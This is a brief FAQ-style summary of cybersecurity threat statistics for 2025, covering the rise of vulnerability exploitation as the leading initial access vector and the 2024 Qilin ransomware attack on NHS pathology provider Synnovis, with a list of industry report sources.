Vulnerability exploitation became the leading initial access vector in 2025 for the first time, accounting for 40 percent of incidents per IBM X-Force. Attacks on public-facing applications surged 44 percent year-over-year. Stolen credentials accounted for 32 percent, down from the top position they held in prior years. The shift is driven by AI-assisted vulnerability discovery and the sheer volume of publicly disclosed flaws: nearly 40,000 in 2025, with 56 percent requiring no authentication to exploit.
What is the Synnovis ransomware case?
Synnovis is a UK NHS pathology services provider hit by the Qilin ransomware group in June 2024. The attack disrupted blood transfusion and testing services across NHS hospitals in London. An NHS review published in 2025 formally confirmed the disruption as a contributing factor in a patient death, making it the first ransomware incident to receive that designation in a UK health authority report. The case is reshaping how regulators classify ransomware attacks on healthcare infrastructure.
Sources: IBM X-Force Threat Intelligence Index 2026; IBM X-Force 2026 Press Release (PRNewswire); Emsisoft: State of Ransomware 2025; Rapid7 Q2 2025 Ransomware Trends; Picus Security: Top 10 Ransomware Groups of 2025; SOC in a Box: Global Ransomware 2025 Annual Analysis